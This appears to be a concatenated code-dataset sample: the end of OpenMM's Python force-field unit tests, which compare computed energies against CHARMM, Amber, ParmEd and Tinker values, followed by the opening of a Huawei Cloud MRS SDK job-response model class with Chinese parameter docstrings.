expected = 0.3*ljEnergy(2.5, 1.1, 3) + 0.3*ljEnergy(3.0, sqrt(0.08), 3) + ljEnergy(3.5, 1.5, 4)
self.assertAlmostEqual(expected, context.getState(getEnergy=True).getPotentialEnergy().value_in_unit(kilojoules_per_mole))
def test_IgnoreExternalBonds(self):
"""Test the ignoreExternalBonds option"""
modeller = Modeller(self.pdb2.topology, self.pdb2.positions)
modeller.delete([next(modeller.topology.residues())])
self.assertRaises(Exception, lambda: self.forcefield2.createSystem(modeller.topology))
system = self.forcefield2.createSystem(modeller.topology, ignoreExternalBonds=True)
templates = self.forcefield2.getMatchingTemplates(modeller.topology, ignoreExternalBonds=True)
self.assertEqual(2, len(templates))
self.assertEqual('ALA', templates[0].name)
self.assertEqual('NME', templates[1].name)
def test_Includes(self):
"""Test using a ForceField that includes other files."""
forcefield = ForceField(os.path.join('systems', 'ff_with_includes.xml'))
self.assertTrue(len(forcefield._atomTypes) > 10)
self.assertTrue('spce-O' in forcefield._atomTypes)
self.assertTrue('HOH' in forcefield._templates)
def test_ImpropersOrdering(self):
"""Test correctness of the ordering of atom indexes in improper torsions
and the torsion.ordering parameter.
"""
xml = """
<ForceField>
<PeriodicTorsionForce ordering="amber">
<Improper class1="C" class2="" class3="O2" class4="O2" periodicity1="2" phase1="3.14159265359" k1="43.932"/>
</PeriodicTorsionForce>
</ForceField>
"""
pdb = PDBFile('systems/impropers_ordering_tetrapeptide.pdb')
# ff1 uses default ordering of impropers, ff2 uses "amber" for the one
# problematic improper
ff1 = ForceField('amber99sbildn.xml')
ff2 = ForceField(StringIO(xml), 'amber99sbildn.xml')
system1 = ff1.createSystem(pdb.topology)
system2 = ff2.createSystem(pdb.topology)
imp1 = system1.getForce(1).getTorsionParameters(158)
imp2 = system2.getForce(0).getTorsionParameters(158)
system1_indexes = [imp1[0], imp1[1], imp1[2], imp1[3]]
system2_indexes = [imp2[0], imp2[1], imp2[2], imp2[3]]
self.assertEqual(system1_indexes, [51, 55, 54, 56])
self.assertEqual(system2_indexes, [51, 55, 54, 56])
def test_ImpropersOrdering_smirnoff(self):
"""Test correctness of the ordering of atom indexes in improper torsions
and the torsion.ordering parameter when using the 'smirnoff' mode.
"""
# SMIRNOFF parameters for formaldehyde
xml = """
<ForceField>
<AtomTypes>
<Type name="[H]C(=O)[H]$C1#0" element="C" mass="12.01078" class="[H]C(=O)[H]$C1#0"/>
<Type name="[H]C(=O)[H]$O1#1" element="O" mass="15.99943" class="[H]C(=O)[H]$O1#1"/>
<Type name="[H]C(=O)[H]$H1#2" element="H" mass="1.007947" class="[H]C(=O)[H]$H1#2"/>
<Type name="[H]C(=O)[H]$H2#3" element="H" mass="1.007947" class="[H]C(=O)[H]$H2#3"/>
</AtomTypes>
<PeriodicTorsionForce ordering="smirnoff">
<Improper class1="[H]C(=O)[H]$C1#0" class2="[H]C(=O)[H]$O1#1" class3="[H]C(=O)[H]$H1#2" class4="[H]C(=O)[H]$H2#3" periodicity1="2" phase1="3.141592653589793" k1="1.5341333333333336"/>
<Improper class1="[H]C(=O)[H]$C1#0" class2="[H]C(=O)[H]$H1#2" class3="[H]C(=O)[H]$H2#3" class4="[H]C(=O)[H]$O1#1" periodicity1="2" phase1="3.141592653589793" k1="1.5341333333333336"/>
<Improper class1="[H]C(=O)[H]$C1#0" class2="[H]C(=O)[H]$H2#3" class3="[H]C(=O)[H]$O1#1" class4="[H]C(=O)[H]$H1#2" periodicity1="2" phase1="3.141592653589793" k1="1.5341333333333336"/>
</PeriodicTorsionForce>
<Residues>
<Residue name="[H]C(=O)[H]">
<Atom name="C1" type="[H]C(=O)[H]$C1#0" charge="0.5632799863815308"/>
<Atom name="O1" type="[H]C(=O)[H]$O1#1" charge="-0.514739990234375"/>
<Atom name="H1" type="[H]C(=O)[H]$H1#2" charge="-0.02426999807357788"/>
<Atom name="H2" type="[H]C(=O)[H]$H2#3" charge="-0.02426999807357788"/>
<Bond atomName1="C1" atomName2="O1"/>
<Bond atomName1="C1" atomName2="H1"/>
<Bond atomName1="C1" atomName2="H2"/>
</Residue>
</Residues>
</ForceField>
"""
pdb = PDBFile('systems/formaldehyde.pdb')
# ff1 uses default ordering of impropers, ff2 uses "amber" for the one
# problematic improper
ff = ForceField(StringIO(xml))
system = ff.createSystem(pdb.topology)
# Check that impropers are applied in the correct three-fold trefoil pattern
forces = { force.__class__.__name__ : force for force in system.getForces() }
force = forces['PeriodicTorsionForce']
created_torsions = set()
for index in range(force.getNumTorsions()):
i,j,k,l,_,_,_ = force.getTorsionParameters(index)
created_torsions.add((i,j,k,l))
expected_torsions = set([(0,3,1,2), (0,1,2,3), (0,2,3,1)])
self.assertEqual(expected_torsions, created_torsions)
def test_Disulfides(self):
"""Test that various force fields handle disulfides correctly."""
pdb = PDBFile('systems/bpti.pdb')
for ff in ['amber99sb.xml', 'amber14-all.xml', 'charmm36.xml', 'amberfb15.xml', 'amoeba2013.xml']:
forcefield = ForceField(ff)
system = forcefield.createSystem(pdb.topology)
def test_IdenticalTemplates(self):
"""Test a case where patches produce two identical templates."""
ff = ForceField('charmm36.xml')
pdb = PDBFile(StringIO("""
ATOM 1 N HIS 1A -2.670 -0.476 0.475 1.00 0.00 N
ATOM 2 HT1 HIS 1A -2.645 -1.336 1.036 1.00 0.00 H
ATOM 3 HT2 HIS 1A -2.859 -0.751 -0.532 1.00 0.00 H
ATOM 4 HT3 HIS 1A -3.415 0.201 0.731 1.00 0.00 H
ATOM 5 CA HIS 1A -1.347 0.163 0.471 1.00 0.00 C
ATOM 6 HA HIS 1A -1.111 0.506 1.479 1.00 0.00 H
ATOM 7 CB HIS 1A -0.352 -0.857 -0.040 1.00 0.00 C
ATOM 8 HB1 HIS 1A -0.360 -1.741 0.636 1.00 0.00 H
ATOM 9 HB2 HIS 1A -0.640 -1.175 -1.046 1.00 0.00 H
ATOM 10 CG HIS 1A 1.003 -0.275 -0.063 1.00 0.00 C
ATOM 11 CD2 HIS 1A 2.143 -0.931 -0.476 1.00 0.00 C
ATOM 12 HD2 HIS 1A 2.217 -1.952 -0.840 1.00 0.00 H
ATOM 13 NE2 HIS 1A 3.137 -0.024 -0.328 1.00 0.00 N
ATOM 14 HE2 HIS 1A 4.132 -0.238 -0.565 1.00 0.00 H
ATOM 15 CE1 HIS 1A 2.649 1.130 0.150 1.00 0.00 C
ATOM 16 HE1 HIS 1A 3.233 2.020 0.360 1.00 0.00 H
ATOM 17 ND1 HIS 1A 1.323 0.973 0.314 1.00 0.00 N
ATOM 18 C HIS 1A -1.465 1.282 -0.497 1.00 0.00 C
ATOM 19 OT1 HIS 1A -2.108 2.309 -0.180 1.00 0.00 O
ATOM 20 OT2 HIS 1A -0.864 1.172 -1.737 1.00 0.00 O
END"""))
# If the check is not done correctly, this will throw an exception.
ff.createSystem(pdb.topology)
def test_CharmmPolar(self):
"""Test the CHARMM polarizable force field."""
pdb = PDBFile('systems/ala_ala_ala_drude.pdb')
pdb.topology.setUnitCellDimensions(Vec3(3, 3, 3))
ff = ForceField('charmm_polar_2019.xml')
system = ff.createSystem(pdb.topology, nonbondedMethod=PME, nonbondedCutoff=1.2*nanometers)
for i,f in enumerate(system.getForces()):
f.setForceGroup(i)
if isinstance(f, NonbondedForce):
f.setPMEParameters(3.4, 64, 64, 64)
integrator = DrudeLangevinIntegrator(300, 1.0, 1.0, 10.0, 0.001)
context = Context(system, integrator, Platform.getPlatformByName('Reference'))
context.setPositions(pdb.positions)
# Compare the energy to values computed by CHARMM. Here is what it outputs:
# ENER ENR: Eval# ENERgy Delta-E GRMS
# ENER INTERN: BONDs ANGLes UREY-b DIHEdrals IMPRopers
# ENER CROSS: CMAPs PMF1D PMF2D PRIMO
# ENER EXTERN: VDWaals ELEC HBONds ASP USER
# ENER EWALD: EWKSum EWSElf EWEXcl EWQCor EWUTil
# ---------- --------- --------- --------- --------- ---------
# ENER> 0 102.83992 0.00000 13.06415
# ENER INTERN> 54.72574 40.21459 11.61009 26.10373 0.14113
# ENER CROSS> -3.37113 0.00000 0.00000 0.00000
# ENER EXTERN> 22.74761 -24.21667 0.00000 0.00000 0.00000
# ENER EWALD> 56.14258 -7279.07968 7197.82192 0.00000 0.00000
# ---------- --------- --------- --------- --------- ---------
# First check the total energy.
energy = context.getState(getEnergy=True).getPotentialEnergy().value_in_unit(kilocalories_per_mole)
self.assertAlmostEqual(102.83992, energy, delta=energy*1e-3)
# Now check individual components. CHARMM and OpenMM split them up a little differently. I've tried to
# match things up, but I think there's still some inconsistency in where forces related to Drude particles
# are categorized. That's why the Coulomb and bonds terms match less accurately than the other terms
# (and less accurately than the total energy, which agrees well).
coulomb = 0
vdw = 0
bonds = 0
angles = 0
propers = 0
impropers = 0
cmap = 0
for i,f in enumerate(system.getForces()):
energy = context.getState(getEnergy=True, groups={i}).getPotentialEnergy().value_in_unit(kilocalories_per_mole)
if isinstance(f, NonbondedForce):
coulomb += energy
elif isinstance(f, CustomNonbondedForce) or isinstance(f, CustomBondForce):
vdw += energy
elif isinstance(f, HarmonicBondForce) or isinstance(f, DrudeForce):
bonds += energy
elif isinstance(f, HarmonicAngleForce):
angles += energy
elif isinstance(f, PeriodicTorsionForce):
propers += energy
elif isinstance(f, CustomTorsionForce):
impropers += energy
elif isinstance(f, CMAPTorsionForce):
cmap += energy
self.assertAlmostEqual(-24.21667+56.14258-7279.07968+7197.82192, coulomb, delta=abs(coulomb)*5e-2) # ELEC+EWKSum+EWSElf+EWEXcl
self.assertAlmostEqual(22.74761, vdw, delta=vdw*1e-3) # VDWaals
self.assertAlmostEqual(54.72574+11.61009, bonds, delta=bonds*2e-2) # BONDs+UREY-b
self.assertAlmostEqual(40.21459, angles, delta=angles*1e-3) # ANGLes
self.assertAlmostEqual(26.10373, propers, delta=propers*1e-3) # DIHEdrals
self.assertAlmostEqual(0.14113, impropers, delta=impropers*1e-3) # IMPRopers
def test_InitializationScript(self):
"""Test that <InitializationScript> tags get executed."""
xml = """
<ForceField>
<InitializationScript>
self.scriptExecuted = True
</InitializationScript>
</ForceField>
"""
ff = ForceField(StringIO(xml))
self.assertTrue(ff.scriptExecuted)
def test_Glycam(self):
"""Test computing energy with GLYCAM."""
ff = ForceField('amber14/protein.ff14SB.xml', 'amber14/GLYCAM_06j-1.xml')
pdb = PDBFile('systems/glycopeptide.pdb')
system = ff.createSystem(pdb.topology)
for i, f in enumerate(system.getForces()):
f.setForceGroup(i)
integrator = VerletIntegrator(0.001)
context = Context(system, integrator, Platform.getPlatformByName('Reference'))
context.setPositions(pdb.positions)
energies = {}
for i, f in enumerate(system.getForces()):
energy = context.getState(getEnergy=True, groups={i}).getPotentialEnergy().value_in_unit(kilojoules_per_mole)
energies[f.getName()] = energy
# Compare to values computed with ParmEd.
self.assertAlmostEqual(32.14082401103625, energies['HarmonicBondForce'], 4)
self.assertAlmostEqual(48.92017455984504, energies['HarmonicAngleForce'], 3)
self.assertAlmostEqual(291.61241586209286, energies['PeriodicTorsionForce'], 4)
self.assertAlmostEqual(1547.011267801862, energies['NonbondedForce'], 4)
self.assertAlmostEqual(1919.6846822348361, sum(list(energies.values())), 3)
def test_CustomNonbondedGenerator(self):
""" Test the CustomNonbondedForce generator"""
pdb = PDBFile('systems/ions.pdb')
xml = """
<ForceField>
<AtomTypes>
<Type name="SOD" class="SOD" element="Na" mass="22.98977"/>
<Type name="CLA" class="CLA" element="Cl" mass="35.45"/>
</AtomTypes>
<Residues>
<Residue name="CLA">
<Atom name="CLA" type="CLA"/>
</Residue>
<Residue name="SOD">
<Atom name="SOD" type="SOD"/>
</Residue>
</Residues>
<CustomNonbondedForce energy="scale*epsilon*((sigma/r)^12-(sigma/r)^6); sigma=halfSig1+halfSig2; epsilon=rootEps1*rootEps2" bondCutoff="3">
<GlobalParameter name="scale" defaultValue="4"/>
<PerParticleParameter name="sigma"/>
<PerParticleParameter name="epsilon"/>
<ComputedValue name="halfSig" expression="0.5*sigma"/>
<ComputedValue name="rootEps" expression="sqrt(epsilon)"/>
<Atom type="CLA" sigma="0.404468018036" epsilon="0.6276"/>
<Atom type="SOD" sigma="0.251367073323" epsilon="0.1962296"/>
</CustomNonbondedForce>
</ForceField> """
ff = ForceField(StringIO(xml))
system = ff.createSystem(pdb.topology)
context = Context(system, VerletIntegrator(2*femtoseconds), Platform.getPlatformByName('Reference'))
context.setPositions(pdb.positions)
energy1 = context.getState(getEnergy=True).getPotentialEnergy().value_in_unit(kilojoules_per_mole)
# See if it matches an equivalent NonbondedForce.
system = System()
system.addParticle(1.0)
system.addParticle(1.0)
f = NonbondedForce()
f.addParticle(0, 0.404468018036, 0.6276)
f.addParticle(0, 0.251367073323, 0.1962296)
system.addForce(f)
context = Context(system, VerletIntegrator(2*femtoseconds), Platform.getPlatformByName('Reference'))
context.setPositions(pdb.positions)
energy2 = context.getState(getEnergy=True).getPotentialEnergy().value_in_unit(kilojoules_per_mole)
self.assertAlmostEqual(energy1, energy2)
def test_OpcEnergy(self):
pdb = PDBFile('systems/opcbox.pdb')
topology, positions = pdb.topology, pdb.positions
self.assertEqual(len(positions), 864)
forcefield = ForceField('opc.xml')
system = forcefield.createSystem(
topology,
nonbondedMethod=PME,
nonbondedCutoff=0.7*nanometer,
constraints=HBonds,
rigidWater=True,
)
integrator = LangevinIntegrator(300*kelvin, 2.0/picoseconds, 2.0*femtoseconds)
simulation = Simulation(topology, system, integrator)
context = simulation.context
context.setPositions(positions)
# Compare to values computed with Amber (sander).
energy_amber = -2647.6233 # kcal/mol
energy_tolerance = 1.0
state = context.getState(getEnergy=True)
energy1 = state.getPotentialEnergy().value_in_unit(kilocalorie_per_mole)
# -2647.2222697324237
self.assertTrue(abs(energy1 - energy_amber) < energy_tolerance)
context.applyConstraints(1e-12)
state = context.getState(getEnergy=True)
energy2 = state.getPotentialEnergy().value_in_unit(kilocalorie_per_mole)
# -2647.441600693312
self.assertTrue(abs(energy1 - energy_amber) < energy_tolerance)
self.assertTrue(abs(energy1 - energy2) < energy_tolerance)
def test_Opc3Energy(self):
pdb = PDBFile('systems/opc3box.pdb')
topology, positions = pdb.topology, pdb.positions
self.assertEqual(len(positions), 648)
forcefield = ForceField('opc3.xml')
system = forcefield.createSystem(
topology,
nonbondedMethod=PME,
nonbondedCutoff=0.7*nanometer,
constraints=HBonds,
rigidWater=True,
)
integrator = LangevinIntegrator(300*kelvin, 2.0/picoseconds, 2.0*femtoseconds)
simulation = Simulation(topology, system, integrator)
context = simulation.context
context.setPositions(positions)
# Compare to values computed with Amber (sander).
energy_amber = -2532.1414 # kcal/mol
energy_tolerance = 1.0
state = context.getState(getEnergy=True)
energy1 = state.getPotentialEnergy().value_in_unit(kilocalorie_per_mole)
# -2532.4862082354407
self.assertTrue(abs(energy1 - energy_amber) < energy_tolerance)
context.applyConstraints(1e-12)
state = context.getState(getEnergy=True)
energy2 = state.getPotentialEnergy().value_in_unit(kilocalorie_per_mole)
self.assertTrue(abs(energy1 - energy_amber) < energy_tolerance)
self.assertTrue(abs(energy1 - energy2) < energy_tolerance)
class AmoebaTestForceField(unittest.TestCase):
"""Test the ForceField.createSystem() method with the AMOEBA forcefield."""
def setUp(self):
"""Set up the tests by loading the input pdb files and force field
xml files.
"""
self.pdb1 = PDBFile('systems/amoeba-ion-in-water.pdb')
self.forcefield1 = ForceField('amoeba2013.xml')
self.topology1 = self.pdb1.topology
def test_NonbondedMethod(self):
"""Test both options for the nonbondedMethod parameter."""
methodMap = {NoCutoff:AmoebaMultipoleForce.NoCutoff,
PME:AmoebaMultipoleForce.PME}
for method in methodMap:
system = self.forcefield1.createSystem(self.pdb1.topology,
nonbondedMethod=method)
forces = system.getForces()
self.assertTrue(any(isinstance(f, AmoebaMultipoleForce) and
f.getNonbondedMethod()==methodMap[method]
for f in forces))
def test_Cutoff(self):
"""Test to make sure the nonbondedCutoff parameter is passed correctly."""
cutoff_distance = 0.7*nanometer
for method in [NoCutoff, PME]:
system = self.forcefield1.createSystem(self.pdb1.topology,
nonbondedMethod=method,
nonbondedCutoff=cutoff_distance,
constraints=None)
for force in system.getForces():
if isinstance(force, AmoebaVdwForce):
self.assertEqual(force.getCutoff(), cutoff_distance)
if isinstance(force, AmoebaMultipoleForce):
self.assertEqual(force.getCutoffDistance(), cutoff_distance)
def test_DispersionCorrection(self):
"""Test to make sure the nonbondedCutoff parameter is passed correctly."""
for useDispersionCorrection in [True, False]:
system = self.forcefield1.createSystem(self.pdb1.topology,
nonbondedMethod=PME,
useDispersionCorrection=useDispersionCorrection)
for force in system.getForces():
if isinstance(force, AmoebaVdwForce):
self.assertEqual(useDispersionCorrection, force.getUseDispersionCorrection())
def test_RigidWater(self):
"""Test that AMOEBA creates rigid water with the correct geometry."""
system = self.forcefield1.createSystem(self.pdb1.topology, rigidWater=True)
constraints = dict()
for i in range(system.getNumConstraints()):
p1,p2,dist = system.getConstraintParameters(i)
if p1 < 3:
constraints[(min(p1,p2), max(p1,p2))] = dist.value_in_unit(nanometers)
hoDist = 0.09572
hohAngle = 108.50*math.pi/180.0
hohDist = math.sqrt(2*hoDist**2 - 2*hoDist**2*math.cos(hohAngle))
self.assertAlmostEqual(constraints[(0,1)], hoDist)
self.assertAlmostEqual(constraints[(0,2)], hoDist)
self.assertAlmostEqual(constraints[(1,2)], hohDist)
# Check that all values of rigidWater are interpreted correctly.
numWaters = 215
self.assertEqual(3*numWaters, system.getNumConstraints())
system = self.forcefield1.createSystem(self.pdb1.topology, rigidWater=False)
self.assertEqual(0, system.getNumConstraints())
system = self.forcefield1.createSystem(self.pdb1.topology, rigidWater=None)
self.assertEqual(0, system.getNumConstraints())
def test_Forces(self):
"""Compute forces and compare them to ones generated with a previous version of OpenMM to ensure they haven't changed."""
pdb = PDBFile('systems/alanine-dipeptide-implicit.pdb')
forcefield = ForceField('amoeba2013.xml', 'amoeba2013_gk.xml')
system = forcefield.createSystem(pdb.topology, polarization='direct')
integrator = VerletIntegrator(0.001)
context = Context(system, integrator, Platform.getPlatformByName('Reference'))
context.setPositions(pdb.positions)
state1 = context.getState(getForces=True)
with open('systems/alanine-dipeptide-amoeba-forces.xml') as input:
state2 = XmlSerializer.deserialize(input.read())
for f1, f2, in zip(state1.getForces().value_in_unit(kilojoules_per_mole/nanometer), state2.getForces().value_in_unit(kilojoules_per_mole/nanometer)):
diff = norm(f1-f2)
self.assertTrue(diff < 0.1 or diff/norm(f1) < 1e-3)
def computeAmoeba18Energies(self, filename):
pdb = PDBFile(filename)
forcefield = ForceField('amoeba2018.xml')
system = forcefield.createSystem(pdb.topology, polarization='mutual', mutualInducedTargetEpsilon=1e-5)
for i, f in enumerate(system.getForces()):
f.setForceGroup(i)
integrator = VerletIntegrator(0.001)
context = Context(system, integrator, Platform.getPlatformByName('Reference'))
context.setPositions(pdb.positions)
energies = {}
for i, f in enumerate(system.getForces()):
state = context.getState(getEnergy=True, groups={i})
energies[f.getName()] = state.getPotentialEnergy().value_in_unit(kilocalories_per_mole)
return energies
def test_Amoeba18BPTI(self):
"""Test that AMOEBA18 computes energies correctly for BPTI."""
energies = self.computeAmoeba18Energies('systems/bpti.pdb')
# Compare to values computed with Tinker.
self.assertAlmostEqual(290.2445, energies['AmoebaBond'], 4)
self.assertAlmostEqual(496.4300, energies['AmoebaAngle']+energies['AmoebaInPlaneAngle'], 4)
self.assertAlmostEqual(51.2913, energies['AmoebaOutOfPlaneBend'], 4)
self.assertAlmostEqual(5.7695, energies['AmoebaStretchBend'], 4)
self.assertAlmostEqual(75.6890, energies['PeriodicTorsionForce'], 4)
self.assertAlmostEqual(19.3364, energies['AmoebaPiTorsion'], 4)
self.assertAlmostEqual(-32.6689, energies['AmoebaTorsionTorsionForce'], 4)
self.assertAlmostEqual(383.8705, energies['AmoebaVdwForce'], 4)
self.assertAlmostEqual(-1323.5640-225.3660, energies['AmoebaMultipoleForce'], 2)
self.assertAlmostEqual(-258.9676, sum(list(energies.values())), 2)
def test_Amoeba18Nucleic(self):
"""Test that AMOEBA18 computes energies correctly for DNA and RNA."""
energies = self.computeAmoeba18Energies('systems/nucleic.pdb')
# Compare to values computed with Tinker.
self.assertAlmostEqual(749.6953, energies['AmoebaBond'], 4)
self.assertAlmostEqual(579.9971, energies['AmoebaAngle']+energies['AmoebaInPlaneAngle'], 4)
self.assertAlmostEqual(10.6630, energies['AmoebaOutOfPlaneBend'], 4)
self.assertAlmostEqual(5.2225, energies['AmoebaStretchBend'], 4)
self.assertAlmostEqual(166.7233, energies['PeriodicTorsionForce'], 4)
self.assertAlmostEqual(57.2066, energies['AmoebaPiTorsion'], 4)
self.assertAlmostEqual(-4.2538, energies['AmoebaStretchTorsion'], 4)
self.assertAlmostEqual(-5.0402, energies['AmoebaAngleTorsion'], 4)
self.assertAlmostEqual(187.1103, energies['AmoebaVdwForce'], 4)
self.assertAlmostEqual(1635.1289-236.1484, energies['AmoebaMultipoleForce'], 3)
self.assertAlmostEqual(3146.3046, sum(list(energies.values())), 3)
if __name__ == '__main__':
unittest.main()
|
17d7b86ac22cb6eb9b4a24d5ad12158a7ebe3841
|
f9d564f1aa83eca45872dab7fbaa26dd48210d08
|
/huaweicloud-sdk-mrs/huaweicloudsdkmrs/v1/model/create_and_execute_job_response.py
|
49ffa381de5a40a509e38025d30f0b1053035f14
|
[
"Apache-2.0"
] |
permissive
|
huaweicloud/huaweicloud-sdk-python-v3
|
cde6d849ce5b1de05ac5ebfd6153f27803837d84
|
f69344c1dadb79067746ddf9bfde4bddc18d5ecf
|
refs/heads/master
| 2023-09-01T19:29:43.013318
| 2023-08-31T08:28:59
| 2023-08-31T08:28:59
| 262,207,814
| 103
| 44
|
NOASSERTION
| 2023-06-22T14:50:48
| 2020-05-08T02:28:43
|
Python
|
UTF-8
|
Python
| false
| false
| 48,564
|
py
|
create_and_execute_job_response.py
|
# coding: utf-8
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class CreateAndExecuteJobResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'templated': 'bool',
'created_at': 'int',
'updated_at': 'int',
'id': 'str',
'tenant_id': 'str',
'job_id': 'str',
'job_name': 'str',
'input_id': 'str',
'output_id': 'str',
'start_time': 'int',
'end_time': 'int',
'cluster_id': 'str',
'engine_job_id': 'str',
'return_code': 'str',
'is_public': 'bool',
'is_protected': 'bool',
'group_id': 'str',
'jar_path': 'str',
'input': 'str',
'output': 'str',
'job_log': 'str',
'job_type': 'int',
'file_action': 'str',
'arguments': 'str',
'hql': 'str',
'job_state': 'int',
'job_final_status': 'int',
'hive_script_path': 'str',
'create_by': 'str',
'finished_step': 'int',
'job_main_id': 'str',
'job_step_id': 'str',
'postpone_at': 'int',
'step_name': 'str',
'step_num': 'int',
'task_num': 'int',
'update_by': 'str',
'credentials': 'str',
'user_id': 'str',
'job_configs': 'dict(str, object)',
'extra': 'dict(str, object)',
'data_source_urls': 'dict(str, object)',
'info': 'dict(str, object)'
}
attribute_map = {
'templated': 'templated',
'created_at': 'created_at',
'updated_at': 'updated_at',
'id': 'id',
'tenant_id': 'tenant_id',
'job_id': 'job_id',
'job_name': 'job_name',
'input_id': 'input_id',
'output_id': 'output_id',
'start_time': 'start_time',
'end_time': 'end_time',
'cluster_id': 'cluster_id',
'engine_job_id': 'engine_job_id',
'return_code': 'return_code',
'is_public': 'is_public',
'is_protected': 'is_protected',
'group_id': 'group_id',
'jar_path': 'jar_path',
'input': 'input',
'output': 'output',
'job_log': 'job_log',
'job_type': 'job_type',
'file_action': 'file_action',
'arguments': 'arguments',
'hql': 'hql',
'job_state': 'job_state',
'job_final_status': 'job_final_status',
'hive_script_path': 'hive_script_path',
'create_by': 'create_by',
'finished_step': 'finished_step',
'job_main_id': 'job_main_id',
'job_step_id': 'job_step_id',
'postpone_at': 'postpone_at',
'step_name': 'step_name',
'step_num': 'step_num',
'task_num': 'task_num',
'update_by': 'update_by',
'credentials': 'credentials',
'user_id': 'user_id',
'job_configs': 'job_configs',
'extra': 'extra',
'data_source_urls': 'data_source_urls',
'info': 'info'
}
def __init__(self, templated=None, created_at=None, updated_at=None, id=None, tenant_id=None, job_id=None, job_name=None, input_id=None, output_id=None, start_time=None, end_time=None, cluster_id=None, engine_job_id=None, return_code=None, is_public=None, is_protected=None, group_id=None, jar_path=None, input=None, output=None, job_log=None, job_type=None, file_action=None, arguments=None, hql=None, job_state=None, job_final_status=None, hive_script_path=None, create_by=None, finished_step=None, job_main_id=None, job_step_id=None, postpone_at=None, step_name=None, step_num=None, task_num=None, update_by=None, credentials=None, user_id=None, job_configs=None, extra=None, data_source_urls=None, info=None):
"""CreateAndExecuteJobResponse
The model defined in huaweicloud sdk
:param templated: 作业执行对象是否由作业模板生成。
:type templated: bool
:param created_at: 作业创建时间,十位时间戳。
:type created_at: int
:param updated_at: 作业更新时间,十位时间戳。
:type updated_at: int
:param id: 作业ID。
:type id: str
:param tenant_id: 项目编号。获取方法,请参见[获取项目ID](https://support.huaweicloud.com/api-mrs/mrs_02_0011.html)。
:type tenant_id: str
:param job_id: 作业应用ID。
:type job_id: str
:param job_name: 作业名称,只能由字母、数字、中划线和下划线组成,并且长度为1~64个字符。 说明: 不同作业的名称允许相同,但不建议设置相同。
:type job_name: str
:param input_id: 数据输入ID。
:type input_id: str
:param output_id: 数据输出ID。
:type output_id: str
:param start_time: 作业执行开始时间,十位时间戳。
:type start_time: int
:param end_time: 作业执行结束时间,十位时间戳。
:type end_time: int
:param cluster_id: 集群ID。
:type cluster_id: str
:param engine_job_id: Oozie工作流ID。
:type engine_job_id: str
:param return_code: 运行结果返回码。
:type return_code: str
:param is_public: 是否公开。 当前版本不支持该功能。
:type is_public: bool
:param is_protected: 是否受保护。 当前版本不支持该功能。
:type is_protected: bool
:param group_id: 作业执行组ID。
:type group_id: str
:param jar_path: 执行程序Jar包或sql文件地址,需要满足如下要求: - 最多为1023字符,不能包含;|&><'$特殊字符,且不可为空或全空格。 - 需要以“/”或“s3a://”开头。OBS路径不支持KMS加密的文件或程序。 - Spark Script需要以“.sql”结尾,MapReduce和Spark Jar需要以“.jar”结尾,sql和jar不区分大小写。
:type jar_path: str
:param input: 数据输入地址,必须以“/”或“s3a://”开头。请配置为正确的OBS路径,OBS路径不支持KMS加密的文件或程序。 最多为1023字符,不能包含;|&>'<$特殊字符,可为空。
:type input: str
:param output: 数据输出地址,必须以“/”或“s3a://”开头。请配置为正确的OBS路径,如果该路径不存在,系统会自动创建。 最多为1023字符,不能包含;|&>'<$特殊字符,可为空。
:type output: str
:param job_log: 作业日志存储地址,该日志信息记录作业运行状态。必须以“/”或“s3a://”开头,请配置为正确的OBS路径。 最多为1023字符,不能包含;|&>'<$特殊字符,可为空。
:type job_log: str
:param job_type: 作业类型码。 - 1:MapReduce - 2:Spark - 3:Hive Script - 4:HiveSQL(当前不支持) - 5:DistCp,导入、导出数据。 - 6:Spark Script - 7:Spark SQL,提交SQL语句,(该接口当前不支持) 说明: 只有包含Spark和Hive组件的集群才能新增Spark和Hive类型的作业。
:type job_type: int
:param file_action: 文件操作类型,包括: - export:从HDFS导出数据至OBS - import:从OBS导入数据至HDFS
:type file_action: str
:param arguments: 程序执行的关键参数,该参数由用户程序内的函数指定,MRS只负责参数的传入。 最多为150000字符,不能包含;|&>'<$!\\\"\\特殊字符,可为空。 说明: 用户输入带有敏感信息(如登录密码)的参数时,可通过在参数名前添加“@”的方式,为该参数值加密,以防止敏感信息被明文形式持久化。在查看作业信息时,敏感信息显示为“*”。 例如:username=admin @password=admin_123
:type arguments: str
:param hql: Hive&Spark Sql语句
:type hql: str
:param job_state: 作业状态码。 - 1:Terminated - 2:Starting - 3:Running - 4:Completed - 5:Abnormal - 6:Error
:type job_state: int
:param job_final_status: 作业最终状态码。 - 0:未完成 - 1:执行错误,终止执行 - 2:执行完成并且成功 - 3:已取消
:type job_final_status: int
:param hive_script_path: sql程序路径,仅Spark Script和Hive Script作业需要使用此参数。需要满足如下要求: - 最多为1023字符,不能包含;|&><'$特殊字符,且不可为空或全空格。 - 需要以“/”或“s3a://”开头,OBS路径不支持KMS加密的文件或程序。 - 需要以“.sql”结尾,sql不区分大小写。
:type hive_script_path: str
:param create_by: 创建作业的用户ID。 为兼容历史版本,保留此参数。
:type create_by: str
:param finished_step: 当前已完成的步骤数。 为兼容历史版本,保留此参数。
:type finished_step: int
:param job_main_id: 作业主ID。 为兼容历史版本,保留此参数。
:type job_main_id: str
:param job_step_id: 作业步骤ID。 为兼容历史版本,保留此参数。
:type job_step_id: str
:param postpone_at: 延迟时间,十位时间戳。 为兼容历史版本,保留此参数。
:type postpone_at: int
:param step_name: 作业步骤名。 为兼容历史版本,保留此参数。
:type step_name: str
:param step_num: 步骤数量 为兼容历史版本,保留此参数。
:type step_num: int
:param task_num: 任务数量。为兼容历史版本,保留此参数。
:type task_num: int
:param update_by: 更新作业的用户ID。
:type update_by: str
:param credentials: 令牌,当前版本不支持。
:type credentials: str
:param user_id: 创建作业的用户ID。 历史版本兼容,不再使用。
:type user_id: str
:param job_configs: 键值对集合,用于保存作业运行配置。
:type job_configs: dict(str, object)
:param extra: 认证信息,当前版本不支持。
:type extra: dict(str, object)
:param data_source_urls: 数据源URL。
:type data_source_urls: dict(str, object)
:param info: 键值对集合,包含oozie返回的作业运行信息。
:type info: dict(str, object)
"""
super(CreateAndExecuteJobResponse, self).__init__()
self._templated = None
self._created_at = None
self._updated_at = None
self._id = None
self._tenant_id = None
self._job_id = None
self._job_name = None
self._input_id = None
self._output_id = None
self._start_time = None
self._end_time = None
self._cluster_id = None
self._engine_job_id = None
